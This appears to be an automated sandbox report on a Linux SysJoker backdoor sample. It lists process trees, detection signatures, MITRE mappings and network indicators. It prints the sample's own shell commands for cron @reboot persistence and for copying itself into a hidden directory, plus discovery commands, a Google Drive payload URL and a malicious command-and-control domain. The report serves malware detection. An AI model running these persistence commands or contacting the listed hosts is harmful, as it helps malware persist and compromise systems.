Play interactive tour

Edit tour

Linux Analysis Report WifCphMYfb

Overview

General Information

Sample Name:	WifCphMYfb
Analysis ID:	551522
MD5:	c805649d6909bf1d7e220f144801044b
SHA1:	b21ba8da278b75e1cc515b6e2c84b91be6611800
SHA256:	d028e64bf4ec97dfd655ccd1157a5b96515d461a710231ac8a529d7bdb936ff3
Infos:

Detection

SysJoker

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Yara detected SysJoker

Multi AV Scanner detection for submitted file

Executes the "crontab" command typically for achieving persistence

Writes ELF files to hidden directories

Executes the "ifconfig" command used to gather network information

Sample tries to persist itself using cron

Writes ELF files to disk

Creates hidden files and/or directories

Executes the "id" command, possibly to determine if the user is root or not

Executes the "grep" command used to find patterns in files or piped streams

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "uname" command used to read OS and architecture name

Executes commands using a shell command-line interpreter

Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed

Executes the "rm" command used to delete files or directories

Classification

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	551522
Start date:	12.01.2022
Start time:	09:43:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	WifCphMYfb
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal72.troj.spyw.evad.lin@0/4@10/0

Process Tree

system is lnxubuntu20

WifCphMYfb (PID: 5200, Parent: 5115, MD5: c805649d6909bf1d7e220f144801044b) Arguments: /tmp/WifCphMYfb

WifCphMYfb New Fork (PID: 5201, Parent: 5200)

sh (PID: 5201, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "id -u"

sh New Fork (PID: 5202, Parent: 5201)

id (PID: 5202, Parent: 5201, MD5: 36f29256a85dfd77d931750f1335b7ab) Arguments: id -u

WifCphMYfb New Fork (PID: 5203, Parent: 5200)

sh (PID: 5203, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami

sh New Fork (PID: 5204, Parent: 5203)

whoami (PID: 5204, Parent: 5203, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami

WifCphMYfb New Fork (PID: 5205, Parent: 5200)

sh (PID: 5205, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | egrep -v \"^(#|$)\" | grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""

sh New Fork (PID: 5206, Parent: 5205)

crontab (PID: 5206, Parent: 5205, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5207, Parent: 5205)

egrep (PID: 5207, Parent: 5205, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: egrep -v ^(#|$)

grep (PID: 5207, Parent: 5205, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -E -v ^(#|$)

sh New Fork (PID: 5208, Parent: 5205)

grep (PID: 5208, Parent: 5205, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -e "@reboot (/.Library/SystemServices/updateSystem)"

WifCphMYfb New Fork (PID: 5209, Parent: 5200)

sh (PID: 5209, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l; echo \"@reboot (/.Library/SystemServices/updateSystem)\") | crontab -"

sh New Fork (PID: 5210, Parent: 5209)

sh New Fork (PID: 5212, Parent: 5210)

crontab (PID: 5212, Parent: 5210, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5211, Parent: 5209)

crontab (PID: 5211, Parent: 5209, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

WifCphMYfb New Fork (PID: 5213, Parent: 5200)

sh (PID: 5213, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -rf '/tmp/WifCphMYfb' '/.Library/SystemServices/updateSystem'"

sh New Fork (PID: 5214, Parent: 5213)

cp (PID: 5214, Parent: 5213, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -rf /tmp/WifCphMYfb /.Library/SystemServices/updateSystem

WifCphMYfb New Fork (PID: 5215, Parent: 5200)

sh (PID: 5215, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "nohup '/.Library/SystemServices/updateSystem' >/dev/null 2>&1 &"

sh New Fork (PID: 5216, Parent: 5215)

nohup (PID: 5216, Parent: 1860, MD5: d8d3ce4d7f4b1e3ac3c3e7c9790f22ca) Arguments: nohup /.Library/SystemServices/updateSystem

updateSystem (PID: 5216, Parent: 1860, MD5: c805649d6909bf1d7e220f144801044b) Arguments: /.Library/SystemServices/updateSystem

updateSystem New Fork (PID: 5217, Parent: 5216)

sh (PID: 5217, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "id -u"

sh New Fork (PID: 5218, Parent: 5217)

id (PID: 5218, Parent: 5217, MD5: 36f29256a85dfd77d931750f1335b7ab) Arguments: id -u

updateSystem New Fork (PID: 5219, Parent: 5216)

sh (PID: 5219, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami

sh New Fork (PID: 5220, Parent: 5219)

whoami (PID: 5220, Parent: 5219, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami

updateSystem New Fork (PID: 5221, Parent: 5216)

sh (PID: 5221, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | egrep -v \"^(#|$)\" | grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""

sh New Fork (PID: 5222, Parent: 5221)

crontab (PID: 5222, Parent: 5221, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5223, Parent: 5221)

egrep (PID: 5223, Parent: 5221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: egrep -v ^(#|$)

grep (PID: 5223, Parent: 5221, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -E -v ^(#|$)

sh New Fork (PID: 5224, Parent: 5221)

grep (PID: 5224, Parent: 5221, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -e "@reboot (/.Library/SystemServices/updateSystem)"

updateSystem New Fork (PID: 5227, Parent: 5216)

sh (PID: 5227, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ifconfig | grep -v 127.0.0.1 | grep -E \"inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})\" | awk '{print $2}'"

sh New Fork (PID: 5228, Parent: 5227)

ifconfig (PID: 5228, Parent: 5227, MD5: 78235087bb226bccf9669e7ea95c0846) Arguments: ifconfig

sh New Fork (PID: 5229, Parent: 5227)

grep (PID: 5229, Parent: 5227, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v 127.0.0.1

sh New Fork (PID: 5230, Parent: 5227)

grep (PID: 5230, Parent: 5227, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -E "inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"

sh New Fork (PID: 5231, Parent: 5227)

awk (PID: 5231, Parent: 5227, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $2}"

updateSystem New Fork (PID: 5232, Parent: 5216)

sh (PID: 5232, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ip address | awk '/ether/{print $2}'"

sh New Fork (PID: 5233, Parent: 5232)

ip (PID: 5233, Parent: 5232, MD5: cd92bd28c8337a4dc4e8b3433befe7e2) Arguments: ip address

sh New Fork (PID: 5234, Parent: 5232)

awk (PID: 5234, Parent: 5232, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "/ether/{print $2}"

updateSystem New Fork (PID: 5235, Parent: 5216)

sh (PID: 5235, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -mrs"

sh New Fork (PID: 5236, Parent: 5235)

uname (PID: 5236, Parent: 5235, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -mrs

dash New Fork (PID: 5275, Parent: 4334)

rm (PID: 5275, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.GwLI0o1M1z /tmp/tmp.Mgt2LAeGaA /tmp/tmp.W8aNoPij1E

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
WifCphMYfb	JoeSecurity_SysJoker	Yara detected SysJoker	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/.Library/SystemServices/updateSystem	JoeSecurity_SysJoker	Yara detected SysJoker	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5200.1.00000000a0bbd638.0000000047fd899a.r-x.sdmp	JoeSecurity_SysJoker	Yara detected SysJoker	Joe Security
Process Memory Space: WifCphMYfb PID: 5200	JoeSecurity_SysJoker	Yara detected SysJoker	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: WifCphMYfb	Virustotal: Detection: 18%			Perma Link
Source: WifCphMYfb	ReversingLabs: Detection: 16%

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34804
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36114
Source: unknown	Network traffic detected: HTTP traffic on port 56350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36108
Source: unknown	Network traffic detected: HTTP traffic on port 34804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56350
Source: unknown	Network traffic detected: HTTP traffic on port 36114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39250 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown	TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown	TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown	TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: WifCphMYfb, updateSystem.38.dr	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-NVty4YX0dPHdxkgMrbdCldQCpCaE-Hn
Source: WifCphMYfb, 5200.1.00000000242f5d77.00000000815491f4.rw-.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-NVty4YX0dPHdxkgMrbdCldQCpCaE-Hn1
Source: updateSystem.38.dr	String found in binary or memory: https://gcc.gnu.org/bugs
Source: log.txt.43.dr	String found in binary or memory: https://graphic-updater.com

Source: classification engine

Classification label: mal72.troj.spyw.evad.lin@0/4@10/0

Persistence and Installation Behavior:

Executes the "crontab" command typically for achieving persistence

Show sources

Source: /bin/sh (PID: 5206)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5212)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5211)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5222)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior

Writes ELF files to hidden directories

Show sources

Source: /usr/bin/cp (PID: 5214)

File written to hidden directory: /.Library/SystemServices/updateSystem

Jump to dropped file

Sample tries to persist itself using cron

Show sources

Source: /usr/bin/crontab (PID: 5211)	File: /var/spool/cron/crontabs/tmp.Lgobsf			Jump to behavior
Source: /usr/bin/crontab (PID: 5211)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /usr/bin/cp (PID: 5214)

File written: /.Library/SystemServices/updateSystem

Jump to dropped file

Source: /tmp/WifCphMYfb (PID: 5200)

Directory: /.Library

Jump to behavior

Source: /bin/sh (PID: 5202)	Executable: /usr/bin/id -> id -u			Jump to behavior
Source: /bin/sh (PID: 5218)	Executable: /usr/bin/id -> id -u			Jump to behavior

Source: /usr/bin/egrep (PID: 5207)	Grep executable: /usr/bin/grep -> grep -E -v ^(#\|$)	Jump to behavior
Source: /bin/sh (PID: 5208)	Grep executable: /usr/bin/grep -> grep -e "@reboot (/.Library/SystemServices/updateSystem)"	Jump to behavior
Source: /usr/bin/egrep (PID: 5223)	Grep executable: /usr/bin/grep -> grep -E -v ^(#\|$)	Jump to behavior
Source: /bin/sh (PID: 5224)	Grep executable: /usr/bin/grep -> grep -e "@reboot (/.Library/SystemServices/updateSystem)"	Jump to behavior
Source: /bin/sh (PID: 5229)	Grep executable: /usr/bin/grep -> grep -v 127.0.0.1	Jump to behavior
Source: /bin/sh (PID: 5230)	Grep executable: /usr/bin/grep -> grep -E "inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"	Jump to behavior

Source: /tmp/WifCphMYfb (PID: 5201)	Shell command executed: sh -c "id -u"	Jump to behavior
Source: /tmp/WifCphMYfb (PID: 5203)	Shell command executed: sh -c whoami	Jump to behavior
Source: /tmp/WifCphMYfb (PID: 5205)	Shell command executed: sh -c "crontab -l \| egrep -v \"^(#\|$)\" \| grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""	Jump to behavior
Source: /tmp/WifCphMYfb (PID: 5209)	Shell command executed: sh -c "(crontab -l; echo \"@reboot (/.Library/SystemServices/updateSystem)\") \| crontab -"	Jump to behavior
Source: /tmp/WifCphMYfb (PID: 5213)	Shell command executed: sh -c "cp -rf '/tmp/WifCphMYfb' '/.Library/SystemServices/updateSystem'"	Jump to behavior
Source: /tmp/WifCphMYfb (PID: 5215)	Shell command executed: sh -c "nohup '/.Library/SystemServices/updateSystem' >/dev/null 2>&1 &"	Jump to behavior
Source: /.Library/SystemServices/updateSystem (PID: 5217)	Shell command executed: sh -c "id -u"	Jump to behavior
Source: /.Library/SystemServices/updateSystem (PID: 5219)	Shell command executed: sh -c whoami	Jump to behavior
Source: /.Library/SystemServices/updateSystem (PID: 5221)	Shell command executed: sh -c "crontab -l \| egrep -v \"^(#\|$)\" \| grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""	Jump to behavior
Source: /.Library/SystemServices/updateSystem (PID: 5227)	Shell command executed: sh -c "ifconfig \| grep -v 127.0.0.1 \| grep -E \"inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})\" \| awk '{print $2}'"	Jump to behavior
Source: /.Library/SystemServices/updateSystem (PID: 5232)	Shell command executed: sh -c "ip address \| awk '/ether/{print $2}'"	Jump to behavior
Source: /.Library/SystemServices/updateSystem (PID: 5235)	Shell command executed: sh -c "uname -mrs"	Jump to behavior

Source: /bin/sh (PID: 5216)

Nohup executable: /usr/bin/nohup -> nohup /.Library/SystemServices/updateSystem

Jump to behavior

Source: /usr/bin/dash (PID: 5275)

Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.GwLI0o1M1z /tmp/tmp.Mgt2LAeGaA /tmp/tmp.W8aNoPij1E

Jump to behavior

Source: /bin/sh (PID: 5231)	Awk executable: /usr/bin/awk -> awk "{print $2}"			Jump to behavior
Source: /bin/sh (PID: 5234)	Awk executable: /usr/bin/awk -> awk "/ether/{print $2}"			Jump to behavior

Source: submitted sample

Stderr: no crontab for rootno crontab for root: exit code = 0

Source: /bin/sh (PID: 5202)	Executable: /usr/bin/id -> id -u			Jump to behavior
Source: /bin/sh (PID: 5218)	Executable: /usr/bin/id -> id -u			Jump to behavior

Source: /.Library/SystemServices/updateSystem (PID: 5216)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/ifconfig (PID: 5228)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 5236)	Queries kernel information via 'uname':	Jump to behavior

Stealing of Sensitive Information:

Yara detected SysJoker

Show sources

Source: Yara match	File source: WifCphMYfb, type: SAMPLE
Source: Yara match	File source: 5200.1.00000000a0bbd638.0000000047fd899a.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WifCphMYfb PID: 5200, type: MEMORYSTR
Source: Yara match	File source: /.Library/SystemServices/updateSystem, type: DROPPED

Executes the "ifconfig" command used to gather network information

Show sources

Source: /bin/sh (PID: 5228)

Ifconfig executable: /usr/sbin/ifconfig -> ifconfig

Jump to behavior

Source: /bin/sh (PID: 5236)

Uname executable: /usr/bin/uname -> uname -mrs

Jump to behavior

Remote Access Functionality:

Yara detected SysJoker

Show sources

Source: Yara match	File source: WifCphMYfb, type: SAMPLE
Source: Yara match	File source: 5200.1.00000000a0bbd638.0000000047fd899a.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WifCphMYfb PID: 5200, type: MEMORYSTR
Source: Yara match	File source: /.Library/SystemServices/updateSystem, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Scheduled Task/Job1	Scheduled Task/Job1	Scripting1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	At (Linux)1	At (Linux)1	Hidden Files and Directories11	LSASS Memory	System Information Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting1	Logon Script (Windows)	Logon Script (Windows)	File Deletion1	Security Account Manager	System Network Configuration Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Linux)1	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WifCphMYfb	19%	Virustotal		Browse
WifCphMYfb	0%	Metadefender		Browse
WifCphMYfb	17%	ReversingLabs	Linux.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
/.Library/SystemServices/updateSystem	19%	Virustotal		Browse
/.Library/SystemServices/updateSystem	0%	Metadefender		Browse
/.Library/SystemServices/updateSystem	17%	ReversingLabs	Linux.Trojan.Generic

Domains

Source	Detection	Scanner	Label	Link
graphic-updater.com	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://graphic-updater.com	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
graphic-updater.com	23.254.131.176	true	true	11%, Virustotal, Browse	unknown
drive.google.com	142.250.181.78	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.65	true	false		high
doc-08-2o-docs.googleusercontent.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://graphic-updater.com	log.txt.43.dr	true	11%, Virustotal, Browse	unknown
https://gcc.gnu.org/bugs	updateSystem.38.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
23.254.131.176	graphic-updater.com	United States	54290	HOSTWINDSUS	true
34.249.145.219	unknown	United States	16509	AMAZON-02US	false
142.250.181.78	drive.google.com	United States	15169	GOOGLEUS	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
142.250.185.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Runtime Messages

Command:	/tmp/WifCphMYfb
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	(crontab -l; echo '@reboot (/.Library/SystemServices/updateSystem)') \| crontab -
Standard Error:	no crontab for root no crontab for root

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
23.254.131.176	XTdh56ustB	Get hash	malicious	Browse
	JGJ5oOtOKb	Get hash	malicious	Browse
	psO5Q4nOUG	Get hash	malicious	Browse
	IGFXCUISERVICE.exe	Get hash	malicious	Browse
	#SysJoker_n2.exe	Get hash	malicious	Browse
	IGFXCUISERVICE.EXE	Get hash	malicious	Browse
	867SzVr2Xa	Get hash	malicious	Browse
34.249.145.219	XTdh56ustB	Get hash	malicious	Browse
	n3at.x86	Get hash	malicious	Browse
	wbFIuLI8b7	Get hash	malicious	Browse
	klveP0L6XD	Get hash	malicious	Browse
	FHGV5hgJWz	Get hash	malicious	Browse
	d6HUyT7qks	Get hash	malicious	Browse
	onuEaFOd80	Get hash	malicious	Browse
	4RB0OtQooX	Get hash	malicious	Browse
	CCxdm3Jdix	Get hash	malicious	Browse
	j8iqN51xhI	Get hash	malicious	Browse
	8t688Zcd4g	Get hash	malicious	Browse
	L22bguJLHg	Get hash	malicious	Browse
	WSPqMZoFam	Get hash	malicious	Browse
	FgUO42I5j3	Get hash	malicious	Browse
	FPW3wzk3QL	Get hash	malicious	Browse
	ebqt8DIT7L	Get hash	malicious	Browse
	3wi8LVRVxG	Get hash	malicious	Browse
	FW0m2y00Dv	Get hash	malicious	Browse
	01Iu8V4PK1	Get hash	malicious	Browse
	EX8I02o9xU	Get hash	malicious	Browse
109.202.202.202	XTdh56ustB	Get hash	malicious	Browse
	n3at.x86	Get hash	malicious	Browse
	n3at.arm	Get hash	malicious	Browse
	garm7	Get hash	malicious	Browse
	garm	Get hash	malicious	Browse
	JGJ5oOtOKb	Get hash	malicious	Browse
	psO5Q4nOUG	Get hash	malicious	Browse
	JdOzFkLRpm	Get hash	malicious	Browse
	wbFIuLI8b7	Get hash	malicious	Browse
	8zkVXtqJFa	Get hash	malicious	Browse
	f6cg55YzSX	Get hash	malicious	Browse
	0Fmm8Lo2Nq	Get hash	malicious	Browse
	n8Rjt61UjL	Get hash	malicious	Browse
	ZdsKaURNkS	Get hash	malicious	Browse
	H1FkOdvcMS	Get hash	malicious	Browse
	klveP0L6XD	Get hash	malicious	Browse
	FFgQFaSl2g	Get hash	malicious	Browse
	arm	Get hash	malicious	Browse
	ZbIfBGPTv5	Get hash	malicious	Browse
	uo8y0L3Dk0	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
graphic-updater.com	XTdh56ustB	Get hash	malicious	Browse	23.254.131.176
	JGJ5oOtOKb	Get hash	malicious	Browse	23.254.131.176
	psO5Q4nOUG	Get hash	malicious	Browse	23.254.131.176
	IGFXCUISERVICE.exe	Get hash	malicious	Browse	23.254.131.176
	#SysJoker_n2.exe	Get hash	malicious	Browse	23.254.131.176
	IGFXCUISERVICE.EXE	Get hash	malicious	Browse	23.254.131.176
	867SzVr2Xa	Get hash	malicious	Browse	23.254.131.176

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTWINDSUS	XTdh56ustB	Get hash	malicious	Browse	23.254.131.176
	JGJ5oOtOKb	Get hash	malicious	Browse	23.254.131.176
	psO5Q4nOUG	Get hash	malicious	Browse	23.254.131.176
	#U266c secured VM.5647.html	Get hash	malicious	Browse	142.11.222.100
	IGFXCUISERVICE.exe	Get hash	malicious	Browse	23.254.131.176
	#SysJoker_n2.exe	Get hash	malicious	Browse	23.254.131.176
	IGFXCUISERVICE.EXE	Get hash	malicious	Browse	23.254.131.176
	867SzVr2Xa	Get hash	malicious	Browse	23.254.131.176
	g6GVx95dFk.xls	Get hash	malicious	Browse	104.168.155.129
	8ILODCNOM4.xls	Get hash	malicious	Browse	104.168.155.129
	YjC8YtL5mm.xls	Get hash	malicious	Browse	104.168.155.129
	AbT54oXloS.xls	Get hash	malicious	Browse	104.168.155.129
	Pxo6lJ3ixn.xls	Get hash	malicious	Browse	104.168.155.129
	a5yyNUUUOO.xls	Get hash	malicious	Browse	104.168.155.129
	1ZXtQq89bt.xls	Get hash	malicious	Browse	104.168.155.129
	QBPQKYk3Ky.xls	Get hash	malicious	Browse	104.168.155.129
	drjueN3vt8.xls	Get hash	malicious	Browse	104.168.155.129
	gxMhx1QlJK.xls	Get hash	malicious	Browse	104.168.155.129
	G7R312DEIB.xls	Get hash	malicious	Browse	104.168.155.129
	ZGuKtur9Jp.xls	Get hash	malicious	Browse	104.168.155.129
AMAZON-02US	XTdh56ustB	Get hash	malicious	Browse	34.249.145.219
	n3at.x86	Get hash	malicious	Browse	34.249.145.219
	jerusalem.x86	Get hash	malicious	Browse	44.241.179.162
	SecuriteInfo.com.Heur.23002.xlsm	Get hash	malicious	Browse	13.58.205.142
	SecuriteInfo.com.Heur.11449.xlsm	Get hash	malicious	Browse	13.58.205.142
	SecuriteInfo.com.Heur.21286.xlsm	Get hash	malicious	Browse	13.58.205.142
	BANK DETAILS AND INVOICE TO RECONFIRM.exe	Get hash	malicious	Browse	3.130.204.160
	SecuriteInfo.com.Heur.31523.xlsm	Get hash	malicious	Browse	13.58.205.142
	gx86	Get hash	malicious	Browse	13.121.76.6
	garm7	Get hash	malicious	Browse	54.171.230.55
	6E52D162BAF265E070EC1A3147AD651D8BD8481D96B33.exe	Get hash	malicious	Browse	52.218.25.40
	psO5Q4nOUG	Get hash	malicious	Browse	54.171.230.55
	7zip.exe	Get hash	malicious	Browse	3.140.13.188
	SecuriteInfo.com.Heur.18407.xlsm	Get hash	malicious	Browse	13.58.205.142
	SecuriteInfo.com.Heur.7584.xlsm	Get hash	malicious	Browse	13.58.205.142
	wbFIuLI8b7	Get hash	malicious	Browse	34.249.145.219
	Sj3sjFWRJa.msi	Get hash	malicious	Browse	52.67.194.250
	klveP0L6XD	Get hash	malicious	Browse	34.249.145.219
	ZbIfBGPTv5	Get hash	malicious	Browse	54.171.230.55
	uX77qSlk7P	Get hash	malicious	Browse	54.171.230.55

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
/.Library/SystemServices/updateSystem	JGJ5oOtOKb	Get hash	malicious	Browse

Created / dropped Files

/.Library/SystemServices/updateSystem Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=745a4ed6eef433ad63274cc43f1cf5ce84094f4e, not stripped
Category:	dropped
Size (bytes):	869336
Entropy (8bit):	6.301392210249311
Encrypted:	false
SSDEEP:	24576:/eUjd10O8iZVdjajDA0KNZmHEWujnQyQ:/erO8iZVdjajDA0KNZmHEWEQX
MD5:	C805649D6909BF1D7E220F144801044B
SHA1:	B21BA8DA278B75E1CC515B6E2C84B91BE6611800
SHA-256:	D028E64BF4EC97DFD655CCD1157A5B96515D461A710231AC8A529D7BDB936FF3
SHA-512:	139480CF9D8C1D9A6D5F2F67CC3D62CF4008439F1BCB00E8CBFDBF0D9B030CA3BC92D3CA340BB8C272BEC5B64CA38DBF1BBB992147FB605DFDA4CF6F72AFE983
Malicious:	true
Yara Hits:	Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: /.Library/SystemServices/updateSystem, Author: Joe Security
Antivirus:	Antivirus: Virustotal, Detection: 19%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 17%
Joe Sandbox View:	Filename: JGJ5oOtOKb, Detection: malicious, Browse
Reputation:	low
